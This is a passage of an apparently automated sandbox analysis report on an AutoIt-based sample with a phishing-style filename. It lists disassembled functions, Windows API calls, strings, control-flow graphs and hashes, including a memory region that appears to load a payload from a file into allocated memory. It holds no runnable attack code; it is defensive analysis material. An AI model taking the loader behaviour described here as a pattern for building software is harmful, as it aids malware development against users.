                                          • Opcode ID: 84fb91b729f7a663e94f3d00c41b44491829ac07f9c1dc3b17efe2cfe0c8026e
                                          • Instruction ID: 1facc8c751997f88d3410c0aaa7d3d3026cdb88c2d8f7d2f04fa84a4c8331199
                                          • Opcode Fuzzy Hash: 84fb91b729f7a663e94f3d00c41b44491829ac07f9c1dc3b17efe2cfe0c8026e
                                          • Instruction Fuzzy Hash: F121C9B1950218AFDF04DF95EC49B9EBBF4FB08710F00822AF514B62A0D7B54588CF95
                                          Function 00DF71EB Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00DF4864: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00EB62F8,?,00DF37C0,?), ref: 00DF4882
                                            • Part of subcall function 00E1074F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00DF72C5), ref: 00E10771
                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00DF7308
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00E2ECF1
                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00E2ED32
                                          • RegCloseKey.ADVAPI32(?), ref: 00E2ED70
                                          • _wcscat.LIBCMT ref: 00E2EDC9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                          • API String ID: 2673923337-2727554177
                                          • Opcode ID: 1332aa0f6c74c6464651bf4cf7a64fc3b87e12c1999e09b496a56e1909e77ec3
                                          • Instruction ID: b63b925f99c814a655a461c55f65119e1dd6d186c2ff5f8cb41dff7a87a9f050
                                          • Opcode Fuzzy Hash: 1332aa0f6c74c6464651bf4cf7a64fc3b87e12c1999e09b496a56e1909e77ec3
                                          • Instruction Fuzzy Hash: 6A7183B14083159EC714EF66EC819ABB7E8FF98340F45552EF585B32B0DB709948CBA1
                                          Function 00DF3633 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 151windowtimeregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 761 df3633-df3681 763 df3683-df3686 761->763 764 df36e1-df36e3 761->764 766 df3688-df368f 763->766 767 df36e7 763->767 764->763 765 df36e5 764->765 768 df36ca-df36d2 DefWindowProcW 765->768 771 df375d-df3765 PostQuitMessage 766->771 772 df3695-df369a 766->772 769 df36ed-df36f0 767->769 770 e2d31c-e2d34a call e011d0 call e011f3 767->770 776 df36d8-df36de 768->776 778 df3715-df373c SetTimer RegisterWindowMessageW 769->778 779 df36f2-df36f3 769->779 805 e2d34f-e2d356 770->805 777 df3711-df3713 771->777 773 e2d38f-e2d3a3 call e52a16 772->773 774 df36a0-df36a2 772->774 773->777 797 e2d3a9 773->797 780 df36a8-df36ad 774->780 781 df3767-df3771 call df4531 774->781 777->776 778->777 782 df373e-df3749 CreatePopupMenu 778->782 785 df36f9-df370c KillTimer call df44cb call df3114 779->785 786 e2d2bf-e2d2c2 779->786 787 e2d374-e2d37b 780->787 788 df36b3-df36b8 780->788 799 df3776 781->799 782->777 785->777 792 e2d2c4-e2d2c6 786->792 793 e2d2f8-e2d317 MoveWindow 786->793 787->768 803 e2d381-e2d38a call e4817e 787->803 795 df36be-df36c4 788->795 796 df374b-df375b call df45df 788->796 800 e2d2e7-e2d2f3 SetFocus 792->800 801 e2d2c8-e2d2cb 792->801 793->777 795->768 795->805 796->777 797->768 799->777 800->777 801->795 806 e2d2d1-e2d2e2 call e011d0 801->806 803->768 805->768 811 e2d35c-e2d36f call df44cb call df43db 805->811 806->777 811->768
                                          APIs
                                          • DefWindowProcW.USER32(?,?,?,?), ref: 00DF36D2
                                          • KillTimer.USER32(?,00000001), ref: 00DF36FC
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00DF371F
                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DF372A
                                          • CreatePopupMenu.USER32 ref: 00DF373E
                                          • PostQuitMessage.USER32(00000000), ref: 00DF375F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                          • String ID: TaskbarCreated$%
                                          • API String ID: 129472671-3835587964
                                          • Opcode ID: 3b8c1d637d26c91a4df85d635c1c75261586c2397a785caf9aead5250504168b
                                          • Instruction ID: d15aff9300e91c88b610e0ebb881c58d1f9c6ce7b3bc4d5198f977efcf455fd3
                                          • Opcode Fuzzy Hash: 3b8c1d637d26c91a4df85d635c1c75261586c2397a785caf9aead5250504168b
                                          • Instruction Fuzzy Hash: 8941F5B220410DBFDB18BB68EC0AB7A3795EB40301F175229F742F62E1DA64DE549271
                                          Function 00DF3A58 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 71windowregistryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetSysColorBrush.USER32(0000000F), ref: 00DF3A62
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00DF3A71
                                          • LoadIconW.USER32(00000063), ref: 00DF3A88
                                          • LoadIconW.USER32(000000A4), ref: 00DF3A9A
                                          • LoadIconW.USER32(000000A2), ref: 00DF3AAC
                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00DF3AD2
                                          • RegisterClassExW.USER32(?), ref: 00DF3B28
                                            • Part of subcall function 00DF3041: GetSysColorBrush.USER32(0000000F), ref: 00DF3074
                                            • Part of subcall function 00DF3041: RegisterClassExW.USER32(00000030), ref: 00DF309E
                                            • Part of subcall function 00DF3041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00DF30AF
                                            • Part of subcall function 00DF3041: InitCommonControlsEx.COMCTL32(?), ref: 00DF30CC
                                            • Part of subcall function 00DF3041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00DF30DC
                                            • Part of subcall function 00DF3041: LoadIconW.USER32(000000A9), ref: 00DF30F2
                                            • Part of subcall function 00DF3041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00DF3101
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                          • String ID: #$0$AutoIt v3
                                          • API String ID: 423443420-4155596026
                                          • Opcode ID: 8244543d7f8f83b89b8a121d2ce896986473fd01658910baf496fc1f5f2cec68
                                          • Instruction ID: 2400422e1bc8f6b8800e7d2eb75910e611499790815a2629c0cc890e9a184caa
                                          • Opcode Fuzzy Hash: 8244543d7f8f83b89b8a121d2ce896986473fd01658910baf496fc1f5f2cec68
                                          • Instruction Fuzzy Hash: 07212171D10308AFEB15DFA6EC05BAE7BB4FB08711F00422AF604B62B0D7B95A588F54
                                          Function 00DF3778 Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 267COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW$b
                                          • API String ID: 1825951767-3834736419
                                          • Opcode ID: 8f4ff41ee988a898dd42b2e03b4987cc1a3fc814be3363cb7fafc91fc9dbe406
                                          • Instruction ID: 55273c63e5cf0c98ef7a5634a69193d7faa78b0eb63c5397a8358c5900d5e39f
                                          • Opcode Fuzzy Hash: 8f4ff41ee988a898dd42b2e03b4987cc1a3fc814be3363cb7fafc91fc9dbe406
                                          • Instruction Fuzzy Hash: 00A14C7191022D9ADB04EBA0DC91AFEB778FF14300F468529F616B7191DB74AA49CB70
                                          Function 00E69E38 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 943 e69e38-e69e72 944 e69e78-e69e7d 943->944 945 e6a1d9-e6a1dd 943->945 944->945 947 e69e83-e69e8c call e46543 944->947 946 e6a1e2-e6a1e3 945->946 948 e6a1e4 call e696db 946->948 952 e69e8e-e69e96 947->952 953 e69e9f-e69ea5 947->953 954 e6a1e9-e6a1ef 948->954 955 e69e98-e69e9a 952->955 956 e69ea7-e69ea9 953->956 957 e69eab 953->957 955->948 958 e69ead-e69eb5 956->958 957->958 959 e69eb7-e69ec1 958->959 960 e69ec3-e69edc call e47a1e 958->960 959->955 963 e69ede-e69ee3 960->963 964 e69ee8-e69eef 960->964 963->946 965 e69ef1-e69efd 964->965 966 e69f3e-e69f6c call e10fa5 964->966 965->966 968 e69eff-e69f0c call e476c5 965->968 971 e69f95-e69f97 966->971 972 e69f6e-e69f7c 966->972 973 e69f11-e69f16 968->973 976 e69f9a-e69fa1 971->976 975 e69f7e 972->975 972->976 973->966 974 e69f18-e69f1f 973->974 979 e69f21-e69f28 974->979 980 e69f2e-e69f35 974->980 981 e69f80-e69f8b call e47096 975->981 977 e69fd2-e69fd9 976->977 978 e69fa3-e69fad 976->978 985 e69fdb-e69fe2 977->985 986 e6a058-e6a065 977->986 982 e69faf-e69fc5 call e470dc 978->982 979->980 983 e69f2a 979->983 980->966 984 e69f37 980->984 996 e69f8d-e69f93 981->996 998 e69fc7-e69fcf 982->998 983->980 984->966 985->986 991 e69fe4-e69ff4 985->991 988 e6a067-e6a071 986->988 989 e6a074-e6a0a3 VariantInit call e13020 986->989 988->989 1001 e6a0a5-e6a0a6 989->1001 1002 e6a0a8-e6a0ab 989->1002 995 e69ff5-e69ffd 991->995 999 e69fff-e6a01c VariantClear 995->999 1000 e6a04a-e6a053 995->1000 996->976 998->977 1003 e6a035-e6a045 999->1003 1004 e6a01e-e6a032 SysAllocString 999->1004 1000->995 1005 e6a055 1000->1005 1006 e6a0ac-e6a0bd call e4dcec 1001->1006 1002->1006 1003->1000 1007 e6a047 1003->1007 1004->1003 1005->986 1008 e6a0c0-e6a0c5 1006->1008 1007->1000 1009 e6a0c7-e6a0cb 1008->1009 1010 e6a103-e6a105 1008->1010 1011 e6a0cd-e6a100 1009->1011 1012 e6a11a-e6a11e 1009->1012 1013 e6a107-e6a10e 1010->1013 1014 e6a12d-e6a150 call e46aa3 call e57804 1010->1014 1011->1010 1015 e6a11f-e6a128 call e696db 1012->1015 1013->1012 1017 e6a110-e6a118 1013->1017 1023 e6a1bc-e6a1cb VariantClear 1014->1023 1027 e6a152-e6a15b 1014->1027 1015->1023 1017->1015 1025 e6a1d5-e6a1d7 1023->1025 1026 e6a1cd-e6a1d0 call e4df93 1023->1026 1025->954 1026->1025 1029 e6a15d-e6a16a 1027->1029 1030 e6a1b3-e6a1ba 1029->1030 1031 e6a16c-e6a173 1029->1031 1030->1023 1030->1029 1032 e6a175-e6a185 1031->1032 1033 e6a1a1-e6a1a5 1031->1033 1032->1030 1036 e6a187-e6a18f 1032->1036 1034 e6a1a7-e6a1a9 1033->1034 1035 e6a1ab 1033->1035 1037 e6a1ad-e6a1ae call e57804 1034->1037 1035->1037 1036->1033 1038 e6a191-e6a197 1036->1038 1037->1030 1038->1033 1040 e6a199-e6a19f 1038->1040 1040->1030 1040->1033
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: NULL Pointer assignment$Not an Object type
                                          • API String ID: 0-572801152
                                          • Opcode ID: f68dcbb90d21479e1fcda8477fbaabfcba211961d0a13c33ece2b3ec9c1260c2
                                          • Instruction ID: 15e23fb65e470309a2ce1ea652ac2b1a445a57d831bd2848d5c5cb389f2c46b4
                                          • Opcode Fuzzy Hash: f68dcbb90d21479e1fcda8477fbaabfcba211961d0a13c33ece2b3ec9c1260c2
                                          • Instruction Fuzzy Hash: AFC1B1B1E4020A9FDF10CF68E884AAEB7F9FB48354F149429E915FB281D770AD45CB51
                                          Function 00DFF8CF Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 168comCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00E103D3
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(00000010,00000000), ref: 00E103DB
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00E103E6
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00E103F1
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(00000011,00000000), ref: 00E103F9
                                            • Part of subcall function 00E103A2: MapVirtualKeyW.USER32(00000012,00000000), ref: 00E10401
                                            • Part of subcall function 00E06259: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00DFFA90), ref: 00E062B4
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00DFFB2D
                                          • OleInitialize.OLE32(00000000), ref: 00DFFBAA
                                          • CloseHandle.KERNEL32(00000000), ref: 00E349F2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                          • String ID: <g$\d$%$c
                                          • API String ID: 1986988660-619945097
                                          • Opcode ID: ec878fd39a8c4c2fd804e7fe3590fc7636ef087e2340f1d13ea7cf375a3d9715
                                          • Instruction ID: c4690c2a4e88064ffc323252f61ea1c670a937835b93fd018189e61e218ad3fd
                                          • Opcode Fuzzy Hash: ec878fd39a8c4c2fd804e7fe3590fc7636ef087e2340f1d13ea7cf375a3d9715
                                          • Instruction Fuzzy Hash: 3D81BCB1901A508FC794EF2BE9566677BE4FB88308310963AD128F7272EB39444D8F61
                                          Function 00FF25C0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1083 ff25c0-ff266e call ff0000 1086 ff2675-ff269b call ff34d0 CreateFileW 1083->1086 1089 ff269d 1086->1089 1090 ff26a2-ff26b2 1086->1090 1091 ff27ed-ff27f1 1089->1091 1098 ff26b9-ff26d3 VirtualAlloc 1090->1098 1099 ff26b4 1090->1099 1092 ff2833-ff2836 1091->1092 1093 ff27f3-ff27f7 1091->1093 1095 ff2839-ff2840 1092->1095 1096 ff27f9-ff27fc 1093->1096 1097 ff2803-ff2807 1093->1097 1100 ff2895-ff28aa 1095->1100 1101 ff2842-ff284d 1095->1101 1096->1097 1102 ff2809-ff2813 1097->1102 1103 ff2817-ff281b 1097->1103 1104 ff26da-ff26f1 ReadFile 1098->1104 1105 ff26d5 1098->1105 1099->1091 1110 ff28ac-ff28b7 VirtualFree 1100->1110 1111 ff28ba-ff28c2 1100->1111 1108 ff284f 1101->1108 1109 ff2851-ff285d 1101->1109 1102->1103 1112 ff281d-ff2827 1103->1112 1113 ff282b 1103->1113 1106 ff26f8-ff2738 VirtualAlloc 1104->1106 1107 ff26f3 1104->1107 1105->1091 1114 ff273f-ff275a call ff3720 1106->1114 1115 ff273a 1106->1115 1107->1091 1108->1100 1116 ff285f-ff286f 1109->1116 1117 ff2871-ff287d 1109->1117 1110->1111 1112->1113 1113->1092 1123 ff2765-ff276f 1114->1123 1115->1091 1119 ff2893 1116->1119 1120 ff287f-ff2888 1117->1120 1121 ff288a-ff2890 1117->1121 1119->1095 1120->1119 1121->1119 1124 ff27a2-ff27b6 call ff3530 1123->1124 1125 ff2771-ff27a0 call ff3720 1123->1125 1131 ff27ba-ff27be 1124->1131 1132 ff27b8 1124->1132 1125->1123 1133 ff27ca-ff27ce 1131->1133 1134 ff27c0-ff27c4 FindCloseChangeNotification 1131->1134 1132->1091 1135 ff27de-ff27e7 1133->1135 1136 ff27d0-ff27db VirtualFree 1133->1136 1134->1133 1135->1086 1135->1091 1136->1135
                                          APIs
                                          • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 00FF2691
                                          • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00FF28B7
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_ff0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateFileFreeVirtual
                                          • String ID:
                                          • API String ID: 204039940-0
                                          • Opcode ID: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                          • Instruction ID: f3f059ebe09de6b5709b97ac44c2aa3e5a32fbf1e355885269fc62e617a72d17
                                          • Opcode Fuzzy Hash: ed516440ab75e0c1ded8a7b1870b24392b753ad5cf7d4aa929dd61e32643855c
                                          • Instruction Fuzzy Hash: 7BA11775E0020CEBDB54DFA4C894BBEB7B5BF48314F208159E601BB290D7799A41EFA4
                                          Function 00DF39E7 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 1244 df39e7-df3a57 CreateWindowExW * 2 ShowWindow * 2
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00DF3A15
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00DF3A36
                                          • ShowWindow.USER32(00000000,?,?), ref: 00DF3A4A
                                          • ShowWindow.USER32(00000000,?,?), ref: 00DF3A53
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 3718a9f356e7679145cf7d5cd53d6ce07ef35d0a42ec6767d1509a7a6a91d1d0
                                          • Instruction ID: 0e57dba942f2a52cf399caa9628368959c1302b5167c26580fae37407be9aa20
                                          • Opcode Fuzzy Hash: 3718a9f356e7679145cf7d5cd53d6ce07ef35d0a42ec6767d1509a7a6a91d1d0
                                          • Instruction Fuzzy Hash: 80F0DA716412907EFA3157276C49E772E7DD7C6F50B00422AFA04B6270C6A91855DAB0
                                          Function 00FF23B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 138fileCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00FF22A0: Sleep.KERNELBASE(000001F4), ref: 00FF22B1
                                          • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00FF24B9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1690070618.0000000000FF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FF0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_ff0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: CreateFileSleep
                                          • String ID: U4NPLTMSLN
                                          • API String ID: 2694422964-2945274439
                                          • Opcode ID: b931587d2ea28876fae88fbe9798d4036c0206a5872a812bc96cef6074a43857
                                          • Instruction ID: c2bb3350ceddae0e6c5d5fc377ec12c3aad3390eb33dcda5a0db80e2568a66f1
                                          • Opcode Fuzzy Hash: b931587d2ea28876fae88fbe9798d4036c0206a5872a812bc96cef6074a43857
                                          • Instruction Fuzzy Hash: 04517D71D1424DEBEF20DBE4C815BEEBB78AF58300F1041A9A709BB2D0D6791B44DBA5
                                          Function 00DF410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00E2D5EC
                                            • Part of subcall function 00DF7D2C: _memmove.LIBCMT ref: 00DF7D66
                                          • _memset.LIBCMT ref: 00DF418D
                                          • _wcscpy.LIBCMT ref: 00DF41E1
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00DF41F1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                          • String ID: Line:
                                          • API String ID: 3942752672-1585850449
                                          • Opcode ID: 4e8b1383b58064811a2fd690a215bae9fe29928f05377aa510cbfe8241a2b944
                                          • Instruction ID: 7441415a9f4a5c7751440eab7417de04a45ae480a796bff65e30711e85d520c2
                                          • Opcode Fuzzy Hash: 4e8b1383b58064811a2fd690a215bae9fe29928f05377aa510cbfe8241a2b944
                                          • Instruction Fuzzy Hash: 3631B3710083189EE721EB60EC45FEB77E8AF55300F15861EF295A20A1EB74A648C7B6
                                          Function 00E1564D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1689947115.0000000000DF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00DF0000, based on PE: true
                                          • Associated: 00000000.00000002.1689935721.0000000000DF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000E7F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1689984425.0000000000EA5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690016446.0000000000EAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.1690029719.0000000000EB8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_df0000_20-EM-00- PI-INQ-3001.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                          • Instruction ID: c43f1bda45d39a0553cc38a20102f1f5c3880e2b42c3399b36ba8f62eb5bc185
                                          • Opcode Fuzzy Hash: cbc132a2d90f1fa170c901e77712e707e3c45fd9b9f6dd10e42efcbbdaed9f46
                                          • Instruction Fuzzy Hash: 9251B372A00B05DFDB249F79C8856EE77A5AF80324F64972AF835B62D0D7709DD08B80
                                          Function 00E47652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?,?,00E4799D), ref: 00E4766F
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00E4758C,80070057,?,?), ref: 00E4768A
